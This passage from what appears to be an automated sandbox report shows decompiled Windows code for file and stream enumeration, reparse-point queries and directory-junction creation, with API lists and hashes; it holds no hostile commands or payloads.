                                                      														continue;
                                                      													}
                                                      													goto L38;
                                                      												}
                                                      												asm("sbb eax, eax");
                                                      												asm("sbb eax, 0xffffffff");
                                                      												goto L40;
                                                      											}
                                                      											_t187 =  *((intOrPtr*)(_t159 + 2));
                                                      											_t46 = _t182 + 2; // 0x5c0000
                                                      											if(_t187 !=  *_t46) {
                                                      												break;
                                                      											}
                                                      											_t159 = _t159 + 4;
                                                      											_t182 = _t182 + 4;
                                                      											if(_t187 != 0) {
                                                      												continue;
                                                      											}
                                                      											goto L30;
                                                      										}
                                                      										asm("sbb eax, eax");
                                                      										asm("sbb eax, 0xffffffff");
                                                      										goto L32;
                                                      									}
                                                      									_t187 =  &(_v1120.cFileName);
                                                      									_t168 = _t187;
                                                      									_t190 =  &(_t168[1]);
                                                      									do {
                                                      										_t177 =  *_t168;
                                                      										_t168 =  &(_t168[1]);
                                                      									} while (_t177 != 0);
                                                      									_t110 = _t168 - _t190 >> 1;
                                                      									goto L23;
                                                      								}
                                                      								L67:
                                                      								FindClose(_v1136);
                                                      								if( *0x4a7541b4 == 0) {
                                                      									goto L69;
                                                      								}
                                                      								_t95 = 0;
                                                      								goto L71;
                                                      							}
                                                      						}
                                                      					} else {
                                                      						_push(_t190);
                                                      						L70:
                                                      						_t95 = E4A750202(_t173, 0x104);
                                                      						L71:
                                                      						_pop(_t188);
                                                      						goto L72;
                                                      					}
                                                      				} else {
                                                      					_t95 = 0xa1;
                                                      					L72:
                                                      					return E4A7313A9(_t95, _t173, _v8 ^ _t191, _t187, _t188, _t190);
                                                      				}
                                                      			}











































                                                      APIs
                                                      • FindFirstFileW.KERNEL32(?,?,?,?,00000000), ref: 4A750509
                                                      • FindFirstFileW.KERNEL32(?,00000400,?,00000104,Function_00009FFC,?,00000104,?), ref: 4A7505B6
                                                        • Part of subcall function 4A750202: GetFullPathNameW.KERNEL32(4A7508D8,00000004,?,?,74EC43D5), ref: 4A750227
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true
                                                      • Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp Download File
                                                      Similarity
                                                      • API ID: FileFindFirst$FullNamePath
                                                      • String ID: \\?\
                                                      • API String ID: 3395701646-4282027825
                                                      • Opcode ID: 6b44f268989e90e5e6ab0d7cd6991940e76a03f05121472c474c03782438ed17
                                                      • Instruction ID: 12ce5535bca37851f76e59468a2e6b27420b47382b98a431a587bc46018822d3
                                                      • Opcode Fuzzy Hash: 6b44f268989e90e5e6ab0d7cd6991940e76a03f05121472c474c03782438ed17
                                                      • Instruction Fuzzy Hash: D0C1F4B2A0521A9EEB709F64CC49FDA7BB8EF05311F0145A1E605D7845E730DE8ECB64
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 78%
                                                      			E4A73A902(void* _a4, void* _a8, intOrPtr _a12, signed int* _a16) {
                                                      				signed int _v8;
                                                      				short _v528;
                                                      				char _v1048;
                                                      				signed int _v17422;
                                                      				signed int _v17424;
                                                      				signed short _v17426;
                                                      				signed int _v17428;
                                                      				void _v17436;
                                                      				char _v17956;
                                                      				short _v18026;
                                                      				char _v18028;
                                                      				char _v18036;
                                                      				intOrPtr _v18040;
                                                      				signed int _v18044;
                                                      				int _v18048;
                                                      				void* _v18052;
                                                      				void* _v18056;
                                                      				void* _v18060;
                                                      				long _v18064;
                                                      				char _v18068;
                                                      				char _v18072;
                                                      				void* __ebx;
                                                      				void* __edi;
                                                      				void* __esi;
                                                      				signed int _t176;
                                                      				signed int _t180;
                                                      				signed int _t181;
                                                      				int _t182;
                                                      				int _t183;
                                                      				int _t185;
                                                      				intOrPtr _t186;
                                                      				int _t190;
                                                      				int _t193;
                                                      				void* _t195;
                                                      				intOrPtr* _t196;
                                                      				int _t201;
                                                      				int _t202;
                                                      				signed int _t204;
                                                      				intOrPtr _t205;
                                                      				int _t206;
                                                      				void* _t207;
                                                      				int _t210;
                                                      				int _t213;
                                                      				intOrPtr _t216;
                                                      				int _t217;
                                                      				void* _t218;
                                                      				int _t221;
                                                      				int _t224;
                                                      				void* _t226;
                                                      				int _t227;
                                                      				intOrPtr* _t229;
                                                      				signed int _t231;
                                                      				void* _t234;
                                                      				signed int _t245;
                                                      				signed int _t246;
                                                      				intOrPtr _t254;
                                                      				int _t255;
                                                      				int _t258;
                                                      				int _t260;
                                                      				int _t265;
                                                      				int _t272;
                                                      				intOrPtr _t279;
                                                      				signed int* _t281;
                                                      				signed short _t285;
                                                      				signed int* _t286;
                                                      				int _t288;
                                                      				intOrPtr _t289;
                                                      				intOrPtr _t291;
                                                      				int _t293;
                                                      				intOrPtr _t296;
                                                      				signed int _t297;
                                                      				void* _t300;
                                                      				int _t301;
                                                      				signed int _t302;
                                                      				signed int* _t303;
                                                      				signed int _t304;
                                                      
                                                      				E4A732C26(0x4694);
                                                      				_t176 =  *0x4a7540ac; // 0xbb40e64e
                                                      				_v8 = _t176 ^ _t304;
                                                      				_t298 = _a8;
                                                      				_t303 = _a16;
                                                      				_t281 = _t298 + 4;
                                                      				_t282 = _t281[7];
                                                      				_v18040 = _a12;
                                                      				_t300 = _a4;
                                                      				 *((intOrPtr*)(_t300 + 0x28)) =  *((intOrPtr*)(_t300 + 0x28)) + _t281[8];
                                                      				_v18060 = _t300;
                                                      				_v18044 = _t298;
                                                      				asm("adc [edi+0x2c], ecx");
                                                      				_t180 =  *_t303;
                                                      				if((_t180 & 0x00000010) == 0 || _t180 < 0) {
                                                      					L2:
                                                      					_t181 =  *_t303;
                                                      					if((_t181 & 0x00000040) == 0) {
                                                      						__eflags = _t181 & 0x00000004;
                                                      						if((_t181 & 0x00000004) != 0) {
                                                      							L21:
                                                      							_t182 = E4A751214(_t281, _t282, _v18040, _t181, _t281);
                                                      							L4:
                                                      							_v18048 = _t182;
                                                      							L5:
                                                      							_t183 = _v18048;
                                                      							goto L6;
                                                      						}
                                                      						__eflags = _t181 & 0x00000402;
                                                      						if(__eflags == 0) {
                                                      							_t285 =  *(_t298 + 2) & 0x0000ffff;
                                                      							__eflags = _t285;
                                                      							if(__eflags == 0) {
                                                      								_t286 =  &(_t281[0xb]);
                                                      							} else {
                                                      								_t286 = _t281 + 0x2c + (_t285 & 0x0000ffff) * 2;
                                                      							}
                                                      							_push(_t281);
                                                      							_t185 = E4A751066(_t281, _t286, _t300, _t303, __eflags, _v18040, _t181, _t286);
                                                      							_v18048 = _t185;
                                                      							__eflags = _t185;
                                                      							if(_t185 == 0) {
                                                      								_t186 =  *0x4a7708d8; // 0xc
                                                      								__eflags = _t186 + 2;
                                                      								E4A742CB6(_t286, _v18040, _t186 + 2);
                                                      								_v18048 = E4A7512BE(_t281, _v18040, _t303[0x17],  *_t303, _t281);
                                                      							}
                                                      							_t183 = E4A74330F(_v18040);
                                                      							__eflags = _t183;
                                                      							if(_t183 == 0) {
                                                      								goto L5;
                                                      							}
                                                      							goto L6;
                                                      						}
                                                      						_t190 = E4A742BCD(_t281, _t282, __eflags, _v18040, _t303[0x17], _t181, _t281);
                                                      						_v18048 = _t190;
                                                      						__eflags = _t190;
                                                      						if(_t190 != 0) {
                                                      							L18:
                                                      							_t183 = E4A74330F(_v18040);
                                                      							__eflags = _t183;
                                                      							if(_t183 != 0) {
                                                      								goto L6;
                                                      							}
                                                      							__eflags =  *_t303 & 0x00100000;
                                                      							if(( *_t303 & 0x00100000) == 0) {
                                                      								goto L5;
                                                      							}
                                                      							_t193 = E4A739F7B( &_v528, 0x104,  *((intOrPtr*)(_t300 + 4)),  &(_t281[0xb]));
                                                      							__eflags = _t193;
                                                      							if(_t193 == 0) {
                                                      								_t195 =  &_v528;
                                                      								__imp__FindFirstStreamW(_t195, 0,  &_v18036, _t193);
                                                      								_t300 = _t195;
                                                      								__eflags = _t300 - 0xffffffff;
                                                      								if(_t300 == 0xffffffff) {
                                                      									goto L5;
                                                      								} else {
                                                      									goto L64;
                                                      								}
                                                      								do {
                                                      									L64:
                                                      									_t196 =  &_v18028;
                                                      									_t298 = _t196 + 2;
                                                      									do {
                                                      										_t288 =  *_t196;
                                                      										_t196 = _t196 + 2;
                                                      										__eflags = _t288;
                                                      									} while (_t288 != 0);
                                                      									__eflags = _t196 - _t298 >> 1 - 2;
                                                      									if(__eflags < 0) {
                                                      										L68:
                                                      										_t201 = E4A751387(_t288, __eflags, _v18040,  *_t303, _t281,  &_v18036);
                                                      										_v18048 = _t201;
                                                      										__eflags = _t201;
                                                      										if(_t201 != 0) {
                                                      											goto L70;
                                                      										}
                                                      										_t183 = E4A74330F(_v18040);
                                                      										__eflags = _t183;
                                                      										if(_t183 != 0) {
                                                      											goto L6;
                                                      										}
                                                      										goto L70;
                                                      									}
                                                      									__eflags = _v18026 - 0x3a;
                                                      									if(__eflags == 0) {
                                                      										goto L70;
                                                      									}
                                                      									goto L68;
                                                      									L70:
                                                      									_t202 =  &_v18036;
                                                      									__imp__FindNextStreamW(_t300, _t202);
                                                      									__eflags = _t202;
                                                      								} while (_t202 != 0);
                                                      								FindClose(_t300);
                                                      							}
                                                      							goto L5;
                                                      						}
                                                      						__eflags =  *_t303 & 0x00000400;
                                                      						if(( *_t303 & 0x00000400) != 0) {
                                                      							_t204 = _v18044;
                                                      							__eflags =  *((short*)(_t204 + 2));
                                                      							if( *((short*)(_t204 + 2)) != 0) {
                                                      								_t272 =  *0x4a7540a8; // 0x13
                                                      								_t296 =  *0x4a7706c4; // 0x11
                                                      								_t51 = _t272 + 2; // 0x13
                                                      								E4A742CB6(_t296, _v18040, _t296 + _t51);
                                                      								_push(_t281);
                                                      								E4A73AA6D(_t281, _t296, _t300, _v18040,  *_t303, _t281 + 0x2c + ( *(_v18044 + 2) & 0x0000ffff) * 2);
                                                      							}
                                                      							_t205 =  *0x4a7706c4; // 0x11
                                                      							_t289 =  *0x4a7708d8; // 0xc
                                                      							_t290 = _t289 + _t205;
                                                      							_t206 =  *0x4a7540a8; // 0x13
                                                      							_t60 = _t206 + 3; // 0xf
                                                      							_t207 = _t289 + _t205 + _t60;
                                                      						} else {
                                                      							_t279 =  *0x4a7706c4; // 0x11
                                                      							_t290 =  *0x4a7540a8; // 0x13
                                                      							_t35 = _t279 + 2; // 0x15
                                                      							_t207 = _t290 + _t35;
                                                      						}
                                                      						E4A742CB6(_t290, _v18040, _t207);
                                                      						__eflags =  *_t303 & 0x00040000;
                                                      						if(( *_t303 & 0x00040000) != 0) {
                                                      							_v18044 = _v18044 & 0x00000000;
                                                      							_v18056 = 0x104;
                                                      							_v18052 = 0x104;
                                                      							_t210 = E4A731896(0x10000);
                                                      							_v18048 = _t210;
                                                      							__eflags = _t210;
                                                      							if(_t210 != 0) {
                                                      								_t213 = E4A739F7B( &_v1048, 0x104,  *((intOrPtr*)(_t300 + 4)),  &(_t281[0xb]));
                                                      								__eflags = _t213;
                                                      								if(_t213 != 0) {
                                                      									L30:
                                                      									E4A73AAF4(_v18040, "...");
                                                      									L35:
                                                      									E4A73142E(_v18048);
                                                      									L36:
                                                      									__eflags =  *_t303 & 0x00000400;
                                                      									_t291 =  *0x4a7708dc; // 0x16
                                                      									if(( *_t303 & 0x00000400) == 0) {
                                                      										_t216 =  *0x4a7706c4; // 0x11
                                                      										_t290 = _t291 + _t216;
                                                      										__eflags = _t290;
                                                      										_t217 =  *0x4a7540a8; // 0x13
                                                      										_t96 = _t217 + 3; // 0x19
                                                      										_t218 = _t290 + _t96;
                                                      									} else {
                                                      										_t254 =  *0x4a7708d8; // 0xc
                                                      										_t290 = _t291 + _t254 +  *0x4a7706c4;
                                                      										_t255 =  *0x4a7540a8; // 0x13
                                                      										_t94 = _t255 + 4; // -1249314474
                                                      										_t218 = _t291 + _t254 +  *0x4a7706c4 + _t94;
                                                      									}
                                                      									E4A742CB6(_t290, _v18040, _t218);
                                                      									goto L17;
                                                      								}
                                                      								_t258 =  *0x4a75402c( &_v1048, 1, _v18048, 0x10000,  &_v18068);
                                                      								__eflags = _t258;
                                                      								if(_t258 == 0) {
                                                      									goto L30;
                                                      								}
                                                      								_push( &_v18072);
                                                      								_t260 =  &_v18044;
                                                      								_push(_t260);
                                                      								_push(_v18048);
                                                      								M4A754028();
                                                      								__eflags = _t260;
                                                      								if(_t260 != 0) {
                                                      									_push( &_v18064);
                                                      									_push( &_v18052);
                                                      									_push( &_v17956);
                                                      									_push( &_v18056);
                                                      									_t265 =  &_v528;
                                                      									_push(_t265);
                                                      									_push(_v18044);
                                                      									_push(0);
                                                      									M4A754024();
                                                      									__eflags = _t265;
                                                      									if(_t265 != 0) {
                                                      										E4A73AAF4(_v18040,  &_v17956);
                                                      										E4A73AAF4(_v18040, E4A732EC8);
                                                      										_push( &_v528);
                                                      									} else {
                                                      										_push("...");
                                                      									}
                                                      									_push(_v18040);
                                                      									E4A73AAF4();
                                                      									_t88 =  &_v18044;
                                                      									 *_t88 = _v18044 & 0x00000000;
                                                      									__eflags =  *_t88;
                                                      									goto L35;
                                                      								}
                                                      								goto L30;
                                                      							}
                                                      							E4A73AAF4(_v18040, "...");
                                                      							goto L36;
                                                      						} else {
                                                      							L17:
                                                      							_push(_t281);
                                                      							_t221 = E4A73AA6D(_t281, _t290, _t300, _v18040,  *_t303,  &(_t281[0xb]));
                                                      							__eflags =  *_t281 & 0x00000400;
                                                      							_v18048 = _t221;
                                                      							if(( *_t281 & 0x00000400) != 0) {
                                                      								__eflags = _t281[9] & 0x20000000;
                                                      								if((_t281[9] & 0x20000000) == 0) {
                                                      									goto L18;
                                                      								}
                                                      								_t224 = E4A739F7B( &_v528, 0x104,  *((intOrPtr*)(_t300 + 4)),  &(_t281[0xb]));
                                                      								__eflags = _t224;
                                                      								if(_t224 == 0) {
                                                      									_t226 = CreateFileW( &_v528, 8, 7, 0, 3, 0x2200000, 0);
                                                      									_v18056 = _t226;
                                                      									__eflags = _t226 - 0xffffffff;
                                                      									if(_t226 != 0xffffffff) {
                                                      										_t298 =  &_v17436;
                                                      										_t227 = DeviceIoControl(_t226, 0x900a8, 0, 0,  &_v17436, 0x4002,  &_v18064, 0);
                                                      										__eflags = _t227;
                                                      										if(_t227 != 0) {
                                                      											E4A73AAF4(_v18040, 0x4a74b0f4);
                                                      											__eflags = _v17436 - 0xa0000003;
                                                      											if(_v17436 != 0xa0000003) {
                                                      												__eflags = _v17436 - 0xa000000c;
                                                      												if(_v17436 != 0xa000000c) {
                                                      													_t229 = 0x4a74b124;
                                                      													_v18044 = 0x4a74b124;
                                                      													_t298 = 0x4a74b126;
                                                      													do {
                                                      														_t293 =  *_t229;
                                                      														_t229 = _t229 + 2;
                                                      														__eflags = _t293;
                                                      													} while (_t293 != 0);
                                                      													_t231 = _t229 - 0x4a74b126;
                                                      													__eflags = _t231;
                                                      													_t301 = (_t231 >> 1) + (_t231 >> 1);
                                                      													L58:
                                                      													_t234 = E4A731896(_t301 + 2);
                                                      													_v18052 = _t234;
                                                      													__eflags = _t234;
                                                      													if(_t234 != 0) {
                                                      														memcpy(_t234, _v18044, _t301);
                                                      														_t302 = _t301 >> 1;
                                                      														__eflags = _t302;
                                                      														 *((short*)(_v18052 + _t302 * 2)) = 0;
                                                      														E4A73AAF4(_v18040, _v18052);
                                                      														E4A73142E(_v18052);
                                                      													}
                                                      													E4A73AAF4(_v18040, 0x4a74b0f0);
                                                      													_t300 = _v18060;
                                                      													L61:
                                                      													CloseHandle(_v18056);
                                                      													goto L18;
                                                      												}
                                                      												_t301 = _v17422 & 0x0000ffff;
                                                      												_v18044 = _t304 + ((_v17424 & 0x0000ffff) >> 1) * 2 - 0x4404;
                                                      												__eflags = _t301;
                                                      												if(_t301 != 0) {
                                                      													goto L58;
                                                      												}
                                                      												_t245 = (_v17428 & 0x0000ffff) >> 1;
                                                      												__eflags = _t245;
                                                      												_t246 = _t304 + _t245 * 2 - 0x4404;
                                                      												L54:
                                                      												_t301 = _v17426 & 0x0000ffff;
                                                      												_v18044 = _t246;
                                                      												goto L58;
                                                      											}
                                                      											_t301 = _v17422 & 0x0000ffff;
                                                      											_v18044 = _t304 + ((_v17424 & 0x0000ffff) >> 1) * 2 - 0x4408;
                                                      											__eflags = _t301;
                                                      											if(_t301 != 0) {
                                                      												goto L58;
                                                      											}
                                                      											_t246 = _t304 + ((_v17428 & 0x0000ffff) >> 1) * 2 - 0x4408;
                                                      											goto L54;
                                                      										}
                                                      										_push(L" [...]");
                                                      										L47:
                                                      										_push(_v18040);
                                                      										E4A73AAF4();
                                                      										goto L61;
                                                      									}
                                                      									_push(L" [..]");
                                                      									goto L47;
                                                      								}
                                                      								E4A73AAF4(_v18040, L" [.]");
                                                      							}
                                                      							goto L18;
                                                      						}
                                                      					}
                                                      					_t182 = E4A73ABA0(_t303, _v18040, _t181,  *((intOrPtr*)(_t300 + 4)), _t281);
                                                      					goto L4;
                                                      				} else {
                                                      					 *_t303 = _t180 & 0xffffffef;
                                                      					_t183 = E4A73B0B7(_t300, _v18040, _t303);
                                                      					 *_t303 =  *_t303 | 0x00000010;
                                                      					_t297 =  *_t303;
                                                      					__eflags = _t183;
                                                      					if(_t183 != 0) {
                                                      						L6:
                                                      						return E4A7313A9(_t183, _t281, _v8 ^ _t304, _t298, _t300, _t303);
                                                      					}
                                                      					_t298 = _v18044;
                                                      					_t282 = _t297 | 0x80000000;
                                                      					 *_t303 = _t297 | 0x80000000;
                                                      					goto L2;
                                                      				}
                                                      			}















































































                                                      0x4a74adc3
                                                      0x4a74adc3
                                                      0x4a74adca
                                                      0x4a74add0
                                                      0x4a74add5
                                                      0x4a74add5
                                                      0x4a74add5
                                                      0x4a74adf2
                                                      0x00000000
                                                      0x4a74adf2
                                                      0x4a74acf9
                                                      0x4a74acff
                                                      0x4a74ad01
                                                      0x00000000
                                                      0x00000000
                                                      0x4a74ad09
                                                      0x4a74ad0a
                                                      0x4a74ad10
                                                      0x4a74ad11
                                                      0x4a74ad17
                                                      0x4a74ad1d
                                                      0x4a74ad1f
                                                      0x4a74ad39
                                                      0x4a74ad40
                                                      0x4a74ad47
                                                      0x4a74ad4e
                                                      0x4a74ad4f
                                                      0x4a74ad55
                                                      0x4a74ad56
                                                      0x4a74ad5c
                                                      0x4a74ad5e
                                                      0x4a74ad64
                                                      0x4a74ad66
                                                      0x4a74ad7c
                                                      0x4a74ad8c
                                                      0x4a74ad97
                                                      0x4a74ad68
                                                      0x4a74ad68
                                                      0x4a74ad68
                                                      0x4a74ad98
                                                      0x4a74ad9e
                                                      0x4a74ada3
                                                      0x4a74ada3
                                                      0x4a74ada3
                                                      0x00000000
                                                      0x4a74ada3
                                                      0x00000000
                                                      0x4a74ad1f
                                                      0x4a74acb8
                                                      0x00000000
                                                      0x4a7432c2
                                                      0x4a7432c2
                                                      0x4a7432c2
                                                      0x4a7432cf
                                                      0x4a7432d4
                                                      0x4a7432da
                                                      0x4a7432e0
                                                      0x4a74adfc
                                                      0x4a74ae03
                                                      0x00000000
                                                      0x00000000
                                                      0x4a74ae1c
                                                      0x4a74ae21
                                                      0x4a74ae23
                                                      0x4a74ae50
                                                      0x4a74ae56
                                                      0x4a74ae5c
                                                      0x4a74ae5f
                                                      0x4a74ae77
                                                      0x4a74ae86
                                                      0x4a74ae8c
                                                      0x4a74ae8e
                                                      0x4a74aeb0
                                                      0x4a74aeb5
                                                      0x4a74aebf
                                                      0x4a74aef4
                                                      0x4a74aefe
                                                      0x4a74af40
                                                      0x4a74af45
                                                      0x4a74af4b
                                                      0x4a74af4e
                                                      0x4a74af4e
                                                      0x4a74af52
                                                      0x4a74af53
                                                      0x4a74af53
                                                      0x4a74af58
                                                      0x4a74af58
                                                      0x4a74af5c
                                                      0x4a74af5f
                                                      0x4a74af63
                                                      0x4a74af68
                                                      0x4a74af6e
                                                      0x4a74af70
                                                      0x4a74af7a
                                                      0x4a74af91
                                                      0x4a74af91
                                                      0x4a74af93
                                                      0x4a74af97
                                                      0x4a74afa2
                                                      0x4a74afa2
                                                      0x4a74afb2
                                                      0x4a74afb7
                                                      0x4a74afbd
                                                      0x4a74afc3
                                                      0x00000000
                                                      0x4a74afc3
                                                      0x4a74af07
                                                      0x4a74af17
                                                      0x4a74af1d
                                                      0x4a74af1f
                                                      0x00000000
                                                      0x00000000
                                                      0x4a74af28
                                                      0x4a74af28
                                                      0x4a74af2a
                                                      0x4a74af31
                                                      0x4a74af31
                                                      0x4a74af38
                                                      0x00000000
                                                      0x4a74af38
                                                      0x4a74aec8
                                                      0x4a74aed8
                                                      0x4a74aede
                                                      0x4a74aee0
                                                      0x00000000
                                                      0x00000000
                                                      0x4a74aeeb
                                                      0x00000000
                                                      0x4a74aeeb
                                                      0x4a74ae90
                                                      0x4a74ae95
                                                      0x4a74ae95
                                                      0x4a74ae9b
                                                      0x00000000
                                                      0x4a74ae9b
                                                      0x4a74ae61
                                                      0x00000000
                                                      0x4a74ae61
                                                      0x4a74ae30
                                                      0x4a74ae30
                                                      0x00000000
                                                      0x4a7432e0
                                                      0x4a7432bc
                                                      0x4a73a96e
                                                      0x00000000
                                                      0x4a740bef
                                                      0x4a740bfa
                                                      0x4a740bfc
                                                      0x4a740c01
                                                      0x4a740c04
                                                      0x4a740c06
                                                      0x4a740c08
                                                      0x4a73a97f
                                                      0x4a73a98d
                                                      0x4a73a98d
                                                      0x4a740c0e
                                                      0x4a740c14
                                                      0x4a740c1a
                                                      0x00000000
                                                      0x4a740c1a

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true
                                                      • Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp
                                                      Similarity
                                                      • API ID:
                                                      • String ID: [...]$ [..]$ [.]$...$:
                                                      • API String ID: 0-1980097535
                                                      • Opcode ID: 61f3f4a93de962a988ecc5eb075e6d6481f0c3ba88e7d9cb49bbe932cbeba014
                                                      • Instruction ID: fee896d7d49aada7d0578bcd98db762e6fe7c12a327a7d923e77e03f8f222394
                                                      • Opcode Fuzzy Hash: 61f3f4a93de962a988ecc5eb075e6d6481f0c3ba88e7d9cb49bbe932cbeba014
                                                      • Instruction Fuzzy Hash: 8502B1F190911AAFDB718F60CD45EEABBB9EF15308F0241D5E608E6051EB329E98CF15
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 93%
                                                      			E4A751E5F(void* __ecx, void* __eflags, WCHAR* _a4) {
                                                      				void* _v8;
                                                      				void* _v12;
                                                      				void* _v16;
                                                      				void* _v20;
                                                      				void* _v24;
                                                      				short _v26;
                                                      				void* _v28;
                                                      				void* _v36;
                                                      				void* _t63;
                                                      				WCHAR* _t66;
                                                      				intOrPtr* _t78;
                                                      				signed short _t82;
                                                      				long _t88;
                                                      				long _t92;
                                                      				short _t94;
                                                      				void* _t99;
                                                      				short* _t100;
                                                      				intOrPtr _t101;
                                                      				WCHAR* _t104;
                                                      				void* _t105;
                                                      
                                                      				_v8 = 1;
                                                      				_v28 = 0;
                                                      				_v26 = 0;
                                                      				_v24 = 0;
                                                      				_v20 = 0;
                                                      				_a4 = E4A751B0B(__ecx, _a4[4]);
                                                      				_t104 = E4A751B0B(__ecx, _a4[6]);
                                                      				_v12 = _t104;
                                                      				if(_a4 == 0 || _t104 == 0) {
                                                      					L18:
                                                      					if(_v24 != 0) {
                                                      						RtlFreeHeap( *( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18), 0, _v24);
                                                      					}
                                                      					if(_v8 != 0 && _v20 != 0) {
                                                      						RemoveDirectoryW(_a4);
                                                      					}
                                                      					return _v8;
                                                      				} else {
                                                      					if(E4A751BCF(_a4) != 0) {
                                                      						if(E4A751B70(_t104) != 0) {
                                                      							if(CreateDirectoryW(_a4, 0) == 0) {
                                                      								goto L18;
                                                      							}
                                                      							_v20 = 1;
                                                      							_t63 = CreateFileW(_a4, 0x40000000, 1, 0, 3, 0x2000000, 0);
                                                      							_v16 = _t63;
                                                      							if(_t63 == 0xffffffff) {
                                                      								goto L18;
                                                      							}
                                                      							RtlDosPathNameToNtPathName_U(_t104,  &_v28, 0, 0);
                                                      							_t66 = _t104;
                                                      							_t18 =  &(_t66[1]); // 0x2
                                                      							_t100 = _t18;
                                                      							do {
                                                      								_t94 =  *_t66;
                                                      								_t66 =  &(_t66[1]);
                                                      							} while (_t94 != 0);
                                                      							_t92 = (_v28 & 0x0000ffff) + 0x14 + (_t66 - _t100 >> 1) * 2;
                                                      							_t105 = E4A731896(_t92);
                                                      							if(_t105 == 0) {
                                                      								L17:
                                                      								CloseHandle(_v16);
                                                      								goto L18;
                                                      							}
                                                      							memset(_t105, 0, _t92);
                                                      							 *_t105 = 0xa0000003;
                                                      							 *((short*)(_t105 + 4)) = _t92 - 8;
                                                      							 *((short*)(_t105 + 8)) = 0;
                                                      							 *(_t105 + 0xa) = _v28;
                                                      							_t30 = _t105 + 0x10; // 0x10
                                                      							memcpy(_t30, _v24, _v28 & 0x0000ffff);
                                                      							 *((short*)(_t105 + 0xc)) =  *(_t105 + 0xa) + 2;
                                                      							_t78 = _v12;
                                                      							_t99 = _t78 + 2;
                                                      							do {
                                                      								_t101 =  *_t78;
                                                      								_t78 = _t78 + 2;
                                                      							} while (_t101 != 0);
                                                      							_t82 = (_t78 - _t99 >> 1) + (_t78 - _t99 >> 1);
                                                      							 *(_t105 + 0xe) = _t82;
                                                      							memcpy(( *(_t105 + 0xa) & 0x0000ffff) + _t105 + 0x12, _v12, _t82 & 0x0000ffff);
                                                      							_t88 = NtFsControlFile(_v16, 0, 0, 0,  &_v36, 0x900a4, _t105, _t92, 0, 0);
                                                      							if(_t88 >= 0) {
                                                      								_v8 = 0;
                                                      							} else {
                                                      								SetLastError(RtlNtStatusToDosError(_t88));
                                                      							}
                                                      							goto L17;
                                                      						}
                                                      						_push(0x40002749);
                                                      						L4:
                                                      						SetLastError();
                                                      						goto L18;
                                                      					}
                                                      					_push(0x4000272e);
                                                      					goto L4;
                                                      				}
                                                      			}
























                                                      APIs
                                                        • Part of subcall function 4A751B0B: GetFullPathNameW.KERNEL32(?,00000000,00000000,?), ref: 4A751B28
                                                        • Part of subcall function 4A751B0B: SetLastError.KERNEL32(00000008,00000000), ref: 4A751B41
                                                        • Part of subcall function 4A751B0B: GetFullPathNameW.KERNEL32(?,00000000,00000000,?,00000000), ref: 4A751B54
                                                      • SetLastError.KERNEL32(40002749), ref: 4A751EBF
                                                      • CreateDirectoryW.KERNEL32(?,00000000), ref: 4A751EDF
                                                      • CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000000,00000000), ref: 4A751F02
                                                      • RtlDosPathNameToNtPathName_U.NTDLL ref: 4A751F1B
                                                      • memset.MSVCRT ref: 4A751F4F
                                                      • memcpy.MSVCRT ref: 4A751F7B
                                                      • memcpy.MSVCRT ref: 4A751FB9
                                                      • NtFsControlFile.NTDLL(?,00000000,00000000,00000000,?,000900A4,00000000,?,00000000,00000000), ref: 4A751FD4
                                                      • RtlNtStatusToDosError.NTDLL ref: 4A751FDF
                                                      • SetLastError.KERNEL32(00000000,?,?,?,?,?,?), ref: 4A751FE6
                                                      • CloseHandle.KERNEL32(?), ref: 4A751FF4
                                                      • RtlFreeHeap.NTDLL(?,00000000,?), ref: 4A75200F
                                                      • RemoveDirectoryW.KERNEL32(?), ref: 4A752022
                                                        • Part of subcall function 4A751BCF: GetVolumePathNameW.KERNEL32 ref: 4A751BF6
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true
                                                      • Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp
                                                      Similarity
                                                      • API ID: Path$ErrorName$Last$CreateDirectoryFileFullmemcpy$CloseControlFreeHandleHeapName_RemoveStatusVolumememset
                                                      • String ID:
                                                      • API String ID: 4118313034-0
                                                      • Opcode ID: 74cb49633a7ed7ba150e2319e91bf76075c9cdc2ee03225223da5b730b40e16c
                                                      • Instruction ID: c0acc987d0af0ec16b7715b188e20a265949b2587f81bd9869a166e2e65519a9
                                                      • Opcode Fuzzy Hash: 74cb49633a7ed7ba150e2319e91bf76075c9cdc2ee03225223da5b730b40e16c
                                                      • Instruction Fuzzy Hash: 9751C37190620AEBCB30AFA5CC48CEFBFB8EF45746B014519F546E7914E7308A45CB60
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 54%
                                                      			E4A73D701(void* __esi, intOrPtr _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16) {
                                                      				signed int _v8;
                                                      				short _v72;
                                                      				short _v328;
                                                      				signed int _v332;
                                                      				signed short _v334;
                                                      				signed short _v336;
                                                      				signed int _v338;
                                                      				signed int _v340;
                                                      				struct _SYSTEMTIME _v348;
                                                      				signed int _v352;
                                                      				struct _FILETIME _v360;
                                                      				struct _FILETIME _v368;
                                                      				void* __ebx;
                                                      				void* __edi;
                                                      				signed int _t54;
                                                      				signed int _t64;
                                                      				signed int _t68;
                                                      				signed int _t71;
                                                      				signed int _t75;
                                                      				int _t84;
                                                      				signed int _t85;
                                                      				void* _t86;
                                                      				signed int _t87;
                                                      				signed int _t92;
                                                      				signed int _t98;
                                                      				int _t103;
                                                      				signed int _t108;
                                                      				signed int _t109;
                                                      				signed int _t112;
                                                      				signed int _t113;
                                                      				void* _t115;
                                                      				signed int _t116;
                                                      				signed int _t117;
                                                      				void _t118;
                                                      				void* _t119;
                                                      				void* _t121;
                                                      				signed int _t122;
                                                      				void* _t123;
                                                      
                                                      				_t119 = __esi;
                                                      				_t54 =  *0x4a7540ac; // 0xbb40e64e
                                                      				_v8 = _t54 ^ _t122;
